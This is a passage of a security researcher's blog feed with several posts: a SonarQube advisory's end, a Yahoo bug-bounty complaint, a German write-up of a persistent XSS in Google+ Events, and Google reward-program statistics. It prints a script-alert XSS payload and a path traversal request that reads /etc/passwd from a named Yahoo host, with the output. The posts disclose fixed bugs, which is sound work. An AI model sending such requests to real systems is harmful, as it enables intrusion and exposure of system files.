role=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;3\. 
</code></pre>
<h2 id="summary">Summary</h2>
<p>Upgrade always to the latest version of SonarQube. Don&apos;t trust the changelog! Probably there is always a security fixed inside the package. Run your SonarQube instance only in your local network to prevent access from the public internet. Setup the SonarQube user management to prevent access from unauthorised users.</p>
<ul>
<li>[1] <a href="http://markmail.org/message/ahckqrlnbs3yjmet#query:+page:1+mid:hlhp6zchme57hwm6+state:results">http://markmail.org/message/ahckqrlnbs3yjmet#query:+page:1+mid:hlhp6zchme57hwm6+state:results</a></li>
<li>[2] <a href="https://github.com/SonarSource/sonar/commit/08257f901822eba9bc060ea3b9b391f314d13218">https://github.com/SonarSource/sonar/commit/08257f901822eba9bc060ea3b9b391f314d13218</a></li>
<li>[3] <a href="http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=11694&amp;version=19350">http://jira.codehaus.org/secure/ReleaseNote.jspa?projectId=11694&amp;version=19350</a></li>
<li>[4] <a href="https://jira.codehaus.org/browse/SONAR-4278">https://jira.codehaus.org/browse/SONAR-4278</a></li>
<li>[5] <a href="http://osvdb.org/94501">http://osvdb.org/94501</a></li>
</ul>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Yahoo, please start with a Vulnerability Reward Program]]></title><description><![CDATA[<!--kg-card-begin: markdown--><blockquote>
<p>Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords <a href="https://twitter.com/search/%23breaking">#breaking</a><br>
&#x2014; Reuters Tech (@ReutersTech) <a href="https://twitter.com/ReutersTech/status/335453433740009477">May 17, 2013</a></p>
</blockquote>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/yahoo.jpeg" alt="yahoo" loading="lazy"></p>
<p>This wouldn&apos;t happen if Yahoo had a Vulnerability Reward Program like <a href="http://www.google.com/about/appsecurity/reward-program/">Google</a>, <a href="https://www.facebook.com/whitehat/">Facebook</a>, <a href="http://www.mozilla.org/security/bug-bounty-faq-webapp.html">Mozilla</a>, <a href="https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues">Paypal</a>, <a href="http://www.etsy.com/help/article/2463">Etsy</a>, etc (<a href="http://bugcrowd.com/list-of-bug-bounty-programs/">list </a>of reward programs @<a href="http://twitter.com/bugcrowd">bugcrowd</a>).</p>
<p>Last</p>]]></description><link>https://www.nilsjuenemann.de/2013/05/19/yahoo-please-start-with-vulnerability-reward-program/</link><guid isPermaLink="false">63b16fb7da1141cc2bec46a4</guid><category><![CDATA[security]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Sun, 19 May 2013 10:03:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><blockquote>
<p>Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords <a href="https://twitter.com/search/%23breaking">#breaking</a><br>
&#x2014; Reuters Tech (@ReutersTech) <a href="https://twitter.com/ReutersTech/status/335453433740009477">May 17, 2013</a></p>
</blockquote>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/yahoo.jpeg" alt="yahoo" loading="lazy"></p>
<p>This wouldn&apos;t happen if Yahoo had a Vulnerability Reward Program like <a href="http://www.google.com/about/appsecurity/reward-program/">Google</a>, <a href="https://www.facebook.com/whitehat/">Facebook</a>, <a href="http://www.mozilla.org/security/bug-bounty-faq-webapp.html">Mozilla</a>, <a href="https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues">Paypal</a>, <a href="http://www.etsy.com/help/article/2463">Etsy</a>, etc (<a href="http://bugcrowd.com/list-of-bug-bounty-programs/">list </a>of reward programs @<a href="http://twitter.com/bugcrowd">bugcrowd</a>).</p>
<p>Last year I discovered a <strong>LFI/Path Traversal vulnerability</strong> in a REST-API used by Yahoo Mail and I got a automated mail from their mailer. I refused to report more bugs to them because it&apos;s boring to talk with bots.</p>
<pre><code>GET /v2/xframe/../../../../../../../etc/passwd?bc
HTTP/1.1
Host: prod1.rest-notify.msg.yahoo.com

HTTP/1.1 200 OK
Connection: close
Expires: Thu, 15 Apr 2020 20:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 29676

root:*:0:0:Charlie &amp;amp;:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &amp;amp;:/:/sbin/nologin
</code></pre>
<p>Some minutes later I got a automated reply from Yahoo Security Contact (security at yahoo-inc.com)</p>
<blockquote>
<p>Nils,</p>
<p>Thank you for contacting Yahoo!.  These issues have been passed<br>
along to the correct teams to investigate.  Should a fix be required,<br>
we will again contact you and ask that you see the issues as resolved.</p>
<p>Thanks again,<br>
Yahoo! Security Contact</p>
</blockquote>
<p>Days later the issue was fixed. But no more replies from them!</p>
<p>Yahoo, please start with a <strong>Vulnerability Reward Program</strong> and get in touch with the community -&#xA0;before it&apos;s too late.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[XSS bei Google - insgesamt $4600 für Schulen in Afrika]]></title><description><![CDATA[<p><a href="http://translate.google.com/translate?sl=de&amp;tl=en&amp;js=n&amp;prev=_t&amp;hl=en&amp;ie=UTF-8&amp;eotf=1&amp;u=http://www.nilsjuenemann.de/2013/01/31/xss-bei-google-insgesamt-4600-fuer-schulen-in-afrika/">English version</a></p><p>Vor zwei Jahren startete Google sein Vulnerability Reward Program und bezahlt seitdem Findern sicherheitsrelevanter Fehler in seinen Web-Anwendungen Belohnungen. In Summe wurden bisher <strong>$704.909,50</strong> (Stand Dez. 2012) ausbezahlt. Obwohl Google bei Spenden den eigentlichen Reward verdoppelt, wurden bisher lediglich <strong>$25.825</strong> (<a href="https://docs.google.com/file/d/0BwS7P2UORGoobzdoRE1aRDRDTGs/edit">Quelle</a> S.42) an gemeinn&</p>]]></description><link>https://www.nilsjuenemann.de/2013/01/31/xss-bei-google-insgesamt-4600-fuer-schulen-in-afrika/</link><guid isPermaLink="false">63b16f1fda1141cc2bec4690</guid><category><![CDATA[security]]></category><category><![CDATA[google]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Thu, 31 Jan 2013 13:28:00 GMT</pubDate><content:encoded><![CDATA[<p><a href="http://translate.google.com/translate?sl=de&amp;tl=en&amp;js=n&amp;prev=_t&amp;hl=en&amp;ie=UTF-8&amp;eotf=1&amp;u=http://www.nilsjuenemann.de/2013/01/31/xss-bei-google-insgesamt-4600-fuer-schulen-in-afrika/">English version</a></p><p>Vor zwei Jahren startete Google sein Vulnerability Reward Program und bezahlt seitdem Findern sicherheitsrelevanter Fehler in seinen Web-Anwendungen Belohnungen. In Summe wurden bisher <strong>$704.909,50</strong> (Stand Dez. 2012) ausbezahlt. Obwohl Google bei Spenden den eigentlichen Reward verdoppelt, wurden bisher lediglich <strong>$25.825</strong> (<a href="https://docs.google.com/file/d/0BwS7P2UORGoobzdoRE1aRDRDTGs/edit">Quelle</a> S.42) an gemeinn&#xFC;tzige Organisationen gespendet.</p><p><a href="http://www.nilsjuenemann.de/2012/04/ethiopia-gets-new-school-thanks-to-xss.html">Letztes Jahr</a> (<em>Ethiopia gets a new school - thanks to a XSS in Google+</em>) konnte ich, dank eines XSS Bugs auf Google+, eine Schule in Welkite/&#xC4;thiopien mit $2.600 unterst&#xFC;tzen.</p><blockquote>Ich m&#xF6;chte Dir [&#x2026;] sehr f&#xFC;r Dein Engagement danken. Deine/Die Spende von Google hat einen gewaltigen Entwicklungschritt m&#xF6;glich gemacht.</blockquote><p>Hendrik Kempfert aus Hamburg von <a href="http://www.socialwaydown.org/wordpress/lang/de">socialwaydown.com</a> hat 2010 bei seinem Sabbatical (<em>Von Hamburg nach Capetown</em>) die Schule in Welkite besucht und viele Leute vor Ort kennengelernt. Inzwischen ist er mit den Projektinitiatoren eng befreundet. Hendrik konnte mir dann auch berichten, dass die Spende einen gro&#xDF;en Fortschritt bewirkt hat.</p><p><a href="http://www.keitahaga.com/">Keita Haga</a> aus Japan &#x2013; ebenfalls Teilnehmer des Bounty Programms &#x2013; spendete $1000 an das gleiche Projekt, was mich sehr gefreut hat.</p><h3 id="persistentes-xss-bei-veranstaltungen-in-google-und-bei-panoramio">Persistentes XSS bei Veranstaltungen in Google+ und bei Panoramio</h3><p>Im Dezember 2012 hat mich Google f&#xFC;r ein XSS bei Google+ und bei Panoramio mit jeweils <strong>$500</strong> belohnt. Bei dem XSS in Google+ handelte es sich um ein persistent XSS in den Veranstaltungen (Events). F&#xFC;gt man einen existierenden Ort zu einem Event hinzu, wird in einem Tooltip die genaue Adresse des Ortes angezeigt. Wichtig dabei, der Ort muss bereits bei Google vorhanden sein.</p><figure class="kg-card kg-image-card"><img src="https://www.nilsjuenemann.de/content/images/2023/01/Bildschirmfoto-2013-01-29-um-14-47-00.png" class="kg-image" alt="alt" loading="lazy" width="400" height="258"></figure><figure class="kg-card kg-image-card"><img src="https://www.nilsjuenemann.de/content/images/2023/01/Bildschirmfoto-2013-01-31-um-11-23-06.png" class="kg-image" alt="alt" loading="lazy" width="400" height="266"></figure><p>Die Adresse wird beim &#xDC;berfliegen mit der Maus in einem Tooltip angezeigt</p><p>Um die Adresse zu manipulieren, war es n&#xF6;tig, den entsprechenden POST Request zum Speichern des Events zu ver&#xE4;ndern. Am besten eignet sich daf&#xFC;r <a href="http://www.portswigger.net/index.html">Burpsuite Pro</a> oder <a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project">ZAP Proxy</a> vom OWASP Project.</p><p>Die Location selber wird durch eine ID festgelegt, der Name und die Adresse sind komplett ver&#xE4;nderbar.</p><p>Nicht korrekt escaped war alles, was im Tooltip angezeigt wird. Es gab dann auch gleich sehr viele Snippets, auf denen das Event mit dem Tooltip angezeigt wurde, die dann auch entsprechend verwundbar waren.</p><p>Orte, an denen das XSS sichtbar war:</p><ul><li>das Event teilen (dann steht es bei jedem Follower in der Timeline)</li><li>Benachrichtigung in der Notificationbar auf allen Google-Seiten mit der Men&#xFC;leiste (document.domain f&#xFC;r das iframe ist immer plus.google.com)</li><li>Benachrichtigungsmails im Gmail (ebenfalls als iframe)</li><li>auf der Event-Seite<br>Theoretisch h&#xE4;tte man mit diesem Fehler einen XSS-Wurm f&#xFC;r Google+ bauen k&#xF6;nnen &#x2013; allerdings w&#xE4;re durch den Tooltip noch ein wenig Nutzerinteraktion notwendig. Google hat den Fehler trotzdem innerhalb weniger Stunden geschlossen.</li></ul><p>Ich habe auf Betterplace zwei spannende Projekte gefunden, die ich mit jeweils $1000 (753 &#x20AC;) unterst&#xFC;tzen m&#xF6;chte. Beide Projekte versuchen Kindern eine Zukunft mit Bildung zu erm&#xF6;glichen. Grundvoraussetzung daf&#xFC;r sind Geb&#xE4;ude und eine Umgebung, die zum Lernen geeignet ist.</p><h3 id="1000-f%C3%BCr-einen-kindergarten-in-tomegb%C3%A9-togo">$ 1000 f&#xFC;r einen Kindergarten in Tomegb&#xE9; / Togo</h3><p>Aus der <a href="https://www.betterplace.org/de/projects/159-kindergarten-fur-togo-fur-eine-bessere-zukunft">Projektbeschreibung</a> f&#xFC;r den neuen Kindergarten:</p><blockquote>&quot;Kindergarten f&#xFC;r Togo&quot; ist ein Projekt, welches von <a href="http://www.agbe.org/">agbe e.V.</a> und dem togoischen Partner Asmerade ins Leben gerufen wurde. Die Initiative stammt direkt aus der Bev&#xF6;lkerung von Tomegb&#xE9;, die bei der Durch- und Weiterf&#xFC;hrung sehr stark beteiligt ist. Der Bauplan hierzu wurde von einem togoischen Architekturb&#xFC;ro erstellt und die drei Kinderg&#xE4;rtnerinnen werden aus der Gemeinde von Tomegb&#xE9; stammen.<br>Der Kindergarten wird f&#xFC;r 120 Kinder einen Platz garantieren k&#xF6;nnen. Doch nicht nur die Kinder profitieren davon, auch deren M&#xFC;tter und damit die gesamte Gemeinschaft. Die wirtschaftliche Situation im Land ist sehr schlecht, die M&#xFC;tter sind &#xFC;berlastet und die mangelhafte Hygiene l&#xE4;sst viele Kinder nicht einmal das Grundschulalter erleben. Die Gemeinde von Tomegb&#xE9; sieht das Fehlen des Kindergartens als Schl&#xFC;sselproblem einer besseren Zukunft an. _</blockquote><h3 id="1000-f%C3%BCr-eine-grundschule-in-ilketunjo-%C3%A4thiopien">$ 1000 f&#xFC;r eine Grundschule in Ilketunjo / &#xC4;thiopien</h3><p>Aus der <a href="https://www.betterplace.org/de/projects/8292-neue-grundschule-fur-1000-kinder-in-ilketunjo">Projektbeschreibung</a> von Betterplace:</p><blockquote>Die Kooperative Ilketunjo hat zwei Schulen, wobei insbesondere die weiter entlegene Schule &#x2013; die sogenannte &#x201E;Satellite School&#x201C; &#x2013; unsere Hilfe ben&#xF6;tigt. Das Geb&#xE4;ude der Schule besteht aus bereits zerfallenden Lehmw&#xE4;nden und einem Lehmboden, sanit&#xE4;re Anlagen fehlen komplett. Die mangelnde Schulausstattung mit M&#xF6;beln wie Tischen, B&#xE4;nken und St&#xFC;hlen macht es fast unm&#xF6;glich die rund 1.000 Kinder der Umgebung zu unterrichten.<br>Diese Situation f&#xFC;hrt dazu, dass die Sch&#xFC;ler nur sehr widerwillig in die Schule gehen und oft &#xFC;ber mehrere Tage nicht am Unterricht teilnehmen. F&#xFC;r uns ist es nur schwer vorstellbar, aber so lernen viele Kinder nicht einmal Grundlegendes wie lesen und schreiben.&#x201D;_</blockquote><h3 id="betterplace-die-crowdfunding-plattform-f%C3%BCr-hilfsprojekte">Betterplace die Crowdfunding Plattform f&#xFC;r Hilfsprojekte</h3><p>betterplace.org ist eine offene Spenden-Plattform im Internet. In Deutschland als gemeinn&#xFC;tzig anerkannte Organisationen, aber auch andere Organisationen und Individualprojekte, k&#xF6;nnen auf der Webseite um Geld-, Sach- oder Zeitspenden werben. &#xDC;ber betterplace.org wurden zwischen der Gr&#xFC;ndung 2007 und Ende April 2010 mehr als 2,5 Millionen Euro gespendet.</p><p>Ich w&#xFC;rde mich freuen, wenn der eine oder andere auch seine Bug Bounty Rewards f&#xFC;r eines der Projekte spendet.</p><ul><li><a href="https://www.betterplace.org/de/projects/159-kindergarten-fur-togo-fur-eine-bessere-zukunft">Kindergarten in Tomegb&#xE9; / Togo</a></li><li><a href="https://www.betterplace.org/en/projects/8292-neue-grundschule-fur-1000-kinder-in-ilketunjo">Grundschule in Ilketunjo / &#xC4;thiopien</a></li></ul>]]></content:encoded></item><item><title><![CDATA[News about Google's Vulnerability Reward Program]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>Recently Adam Mein spoke at <a href="http://www.appsecusa.org/">AppSec USA 2012</a> and Kevin Stadmeyer at <a href="http://syscan360.org/en/schedule.html">SysScan 360</a> in Beijing about Google&apos;s experience with the Web Vulnerability Reward Program. Both are Security Program Manager at Google.</p>
<ul>
<li>31 October 2011 - Bug Bounty Panel with Adam Mein at OWASP AppSec 2012 (<a href="http://www.youtube.com/watch?v=k8Hx_XDUxXA">Video</a>, <a href="http://blog.bugcrowd.com/transcript-of-the-bug-bounty-program-panel-at-appsecusa-2012/">Transcript</a></li></ul>]]></description><link>https://www.nilsjuenemann.de/2012/12/16/news-about-googles-vulnerability-reward-program/</link><guid isPermaLink="false">63b16e75da1141cc2bec4678</guid><category><![CDATA[security]]></category><category><![CDATA[google]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Sun, 16 Dec 2012 16:13:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>Recently Adam Mein spoke at <a href="http://www.appsecusa.org/">AppSec USA 2012</a> and Kevin Stadmeyer at <a href="http://syscan360.org/en/schedule.html">SysScan 360</a> in Beijing about Google&apos;s experience with the Web Vulnerability Reward Program. Both are Security Program Manager at Google.</p>
<ul>
<li>31 October 2011 - Bug Bounty Panel with Adam Mein at OWASP AppSec 2012 (<a href="http://www.youtube.com/watch?v=k8Hx_XDUxXA">Video</a>, <a href="http://blog.bugcrowd.com/transcript-of-the-bug-bounty-program-panel-at-appsecusa-2012/">Transcript</a>)</li>
<li>13 December 2012 - <a href="https://docs.google.com/open?id=0BwS7P2UORGoobzdoRE1aRDRDTGs">Kevin Stadmeyer at SysScan 360 in Beijing</a>, <a href="http://syscan360.org/en/schedule.html">Conference Schedule</a></li>
</ul>
<p>Kevin&apos;s <a href="https://docs.google.com/file/d/0BwS7P2UORGoobzdoRE1aRDRDTGs/edit">slides </a>are only available in PDF. But I tried to extract some numbers from the images and recreated the charts with Google Spreadsheets (charts below).</p>
<p>They told that they have paid for about 50/50 in terms of sensitive apps and non-sensitive apps. Even more in non-google.com domains and it&apos;s not surprising that 20% of people are responsible for ~80% of the bugs (<a href="http://en.wikipedia.org/wiki/Pareto_principle">http://en.wikipedia.org/wiki/Pareto_principle</a>).</p>
<p>Whats else happened this year? <a href="http://googleonlinesecurity.blogspot.de/2012/04/spurring-more-vulnerability-research.html">In April</a>&#xA0;the reward amounts increased up to $20,000 for RCE bugs on production servers. I&apos;m not sure whether this incentive measure has led to more bug reports. I think most of the &quot;low hanging fruits&quot; are already discovered by the various tester in the world. The bug-tickets/month will now be dependent on how many changes Google makes every month to its applications.</p>
<p>Since October all application security informations are bundled into a <a href="http://www.google.com/about/appsecurity/">new page</a>. It included the new ranked <a href="http://www.google.com/about/appsecurity/hall-of-fame/">&quot;Hall of Fame&quot;</a>, the publications of their&#xA0;<a href="http://www.google.com/about/appsecurity/research/">security research</a>&#xA0;and a listing with all&#xA0;<a href="http://www.google.com/about/appsecurity/research/presentations/">security conferences</a> where a Google employee was speaking.</p>
<p>Google&apos;s information security team has also recently hired one engineer from the VRP regulars. They hired also this year two new Security Program Manager. For me this is sign for a strong committment to the VRP and a sign to strengthen their long-term relationship with the security community.</p>
<p>In total Google has paid <strong>$ 704,909.50</strong> since the beginning of VRP in end of 2010 for bugs in web applications.</p>
<script src="//ajax.googleapis.com/ajax/static/modules/gviz/1.0/chart.js" type="text/javascript"> {"dataSourceUrl":"//docs.google.com/spreadsheet/tq?key=0AgS7P2UORGoodFF2ajRMelU4TExLRWxHeC1Vd1BkSFE&transpose=0&headers=1&range=A1%3AB26&gid=0&pub=1","options":{"vAxes":[{"useFormatFromData":true,"title":null,"minValue":null,"logScale":false,"viewWindow":{"min":null,"max":null},"maxValue":null},{"useFormatFromData":true,"minValue":null,"logScale":false,"viewWindow":{"min":null,"max":null},"maxValue":null}],"titleTextStyle":{"bold":true,"color":"#000","fontSize":16},"series":{"0":{"errorBars":{"errorType":"none"}}},"booleanRole":"certainty","title":"Bugs filed / Month","animation":{"duration":0},"legend":"none","hAxis":{"useFormatFromData":true,"slantedTextAngle":90,"slantedText":true,"minValue":null,"viewWindowMode":null,"textStyle":{"color":"#222","fontSize":"10"},"viewWindow":null,"maxValue":null},"isStacked":false,"tooltip":{},"width":750,"height":371},"state":{},"view":{},"chartType":"ColumnChart","chartName":"Chart 3"} </script>
<script src="//ajax.googleapis.com/ajax/static/modules/gviz/1.0/chart.js" type="text/javascript"> {"dataSourceUrl":"//docs.google.com/spreadsheet/tq?key=0AgS7P2UORGoodFF2ajRMelU4TExLRWxHeC1Vd1BkSFE&transpose=0&headers=0&range=A2%3AB9&gid=1&pub=1","options":{"vAxes":[{"useFormatFromData":true,"minValue":null,"viewWindow":{"min":null,"max":null},"maxValue":null},{"useFormatFromData":true,"minValue":null,"viewWindow":{"min":null,"max":null},"maxValue":null}],"titleTextStyle":{"bold":true,"color":"#000","fontSize":16},"pieHole":0,"booleanRole":"certainty","title":"What types of bugs do they find?","animation":{"duration":0},"colors":["#3366CC","#DC3912","#FF9900","#109618","#990099","#0099C6","#DD4477","#66AA00","#B82E2E","#316395","#994499","#22AA99","#AAAA11","#6633CC","#E67300","#8B0707","#651067","#329262","#5574A6","#3B3EAC","#B77322","#16D620","#B91383","#F4359E","#9C5935","#A9C413","#2A778D","#668D1C","#BEA413","#0C5922","#743411"],"is3D":true,"hAxis":{"useFormatFromData":true,"minValue":null,"viewWindow":{"min":null,"max":null},"maxValue":null},"tooltip":{},"width":750,"height":318},"state":{},"view":{},"chartType":"PieChart","chartName":"Chart 2"} </script>
<h3 id="money-distribution-heatmap-by-country">Money distribution heatmap by country</h3>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/google-money-heatmap.jpeg" alt="google-money-heatmap" loading="lazy"></p>
<p><strong>$410,000</strong> in the first year of VRP and <strong>$704,909.50</strong> in total at end of August 2012.</p>
<p>The country ranking is: Germany, USA, Poland, Japan, Israel, Brazil, Russia.</p>
<p>Some older insights and numbers from Google about VRP:</p>
<ul>
<li>9 February 2011 -&#xA0;<a href="http://googleonlinesecurity.blogspot.de/2012/02/celebrating-one-year-of-web.html">Update from Adam Mein in Google Online Security Blog</a></li>
<li>7 March 2011 -&#xA0;<a href="https://docs.google.com/present/view?id=dfgb2455_20hnx2mdhh">Slides from Adam Mein at SANS AppSec 2011</a></li>
</ul>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Google's "0x0A List"]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>I&apos;m very excited, because the Google Security Team has launched new Application Security pages, including a new <strong>Hall of Fame</strong> called <strong>0x0A list</strong>.</p>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/google-gift--1-.jpeg" alt="google-gift--1-" loading="lazy"></p>
<p>Now all related security informations are bundled to a central page.</p>
<p>The table below lists the top 10 superstar perform,er since Google launched the</p>]]></description><link>https://www.nilsjuenemann.de/2012/10/01/googles-0x0a-list/</link><guid isPermaLink="false">63b16dbbda1141cc2bec465e</guid><category><![CDATA[security]]></category><category><![CDATA[google]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Mon, 01 Oct 2012 16:28:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>I&apos;m very excited, because the Google Security Team has launched new Application Security pages, including a new <strong>Hall of Fame</strong> called <strong>0x0A list</strong>.</p>
<p><img src="https://www.nilsjuenemann.de/content/images/2023/01/google-gift--1-.jpeg" alt="google-gift--1-" loading="lazy"></p>
<p>Now all related security informations are bundled to a central page.</p>
<p>The table below lists the top 10 superstar perform,er since Google launched the vulnerability reward program back in November 2010.&#xA0;Here is the initial list from the 1th October 2012, completed with an additional link to the twitter profile and the origin of these guys.I&apos;m very happy to see my name on top after &gt;250 submissions. Thank you so much Google and congratulation to all people on the list.</p>
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #444444; font-size: 13px; line-height: 20px; margin: 10px 0px; text-align: start;"><tbody>  
<tr style="background-color: #fafafa;"><th style="background-color: whitesmoke; border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Rank</span></th><th style="background-color: whitesmoke; border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Name</span></th><th style="background-color: whitesmoke; border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Link</span></th><th style="background-color: whitesmoke; border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Country</span></th></tr>  
<tr><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x01</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><a href="http://twitter.com/totally_unknown" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Nils Juenemann</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><a href="http://www.nilsjuenemann.de/" rel="nofollow" style="color: #7759ae; text-decoration: none;"><span style="font-family: Arial, Helvetica, sans-serif;"></span></a><a href="http://www.nilsjuenemann.de/">http://www.nilsjuenemann.de/</a></td>  
<td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Germany</span></td>  
</tr>  
<tr style="background-color: #fafafa;"><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x02</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><a href="https://twitter.com/Czubaka" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Szymon Gruszecki</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><a href="http://mars.iti.pk.edu.pl/~grucha" rel="nofollow" style="color: #7759ae; text-decoration: none;"><span style="font-family: Arial, Helvetica, sans-serif;"></span></a><a href="http://mars.iti.pk.edu.pl/~grucha">http://mars.iti.pk.edu.pl/~grucha</a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Poland</span></td></tr>  
<tr><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x03</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><a href="https://twitter.com/kinugawamasato" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Masato Kinugawa</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.google.com/about/appsecurity/hall-of-fame/" rel="nofollow" style="color: #7759ae; text-decoration: none;"></a></span></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Japan</span></td></tr>  
<tr style="background-color: #fafafa;"><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x04</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><a href="https://twitter.com/christ1an" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Christian Matthies</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.google.com/about/appsecurity/hall-of-fame/" rel="nofollow" style="color: #7759ae; text-decoration: none;"></a></span></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Germany</span></td></tr>  
<tr><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x05</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><a href="https://twitter.com/Nirgoldshlager" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Nir Goldshlager</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><a href="http://www.nirgoldshlager.com/" rel="nofollow" style="color: #7759ae; text-decoration: none;"><span style="font-family: Arial, Helvetica, sans-serif;"></span></a><a href="http://www.nirgoldshlager.com">http://www.nirgoldshlager.com</a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Israel</span></td></tr>  
<tr style="background-color: #fafafa;"><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x06</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><a href="https://twitter.com/albinowax" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">James &quot;albino&quot; Kettle</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><a href="http://skeletonscribe.net/" rel="nofollow" style="color: #7759ae; text-decoration: none;"><span style="font-family: Arial, Helvetica, sans-serif;">skeletonscribe.net</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">England</span></td></tr>  
<tr><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x07</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/whhackersbr" target="_blank">Joao Lucas Melo Brasio</a></span></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><a href="http://www.whitehathackers.com.br/" rel="nofollow" style="color: #7759ae; text-decoration: none;"><span style="font-family: Arial, Helvetica, sans-serif;">White Hat Hackers Consultoria de Seguran&#xE7;a da Informa&#xE7;&#xE3;o LTDA (Brazil)</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Brazil</span></td></tr>  
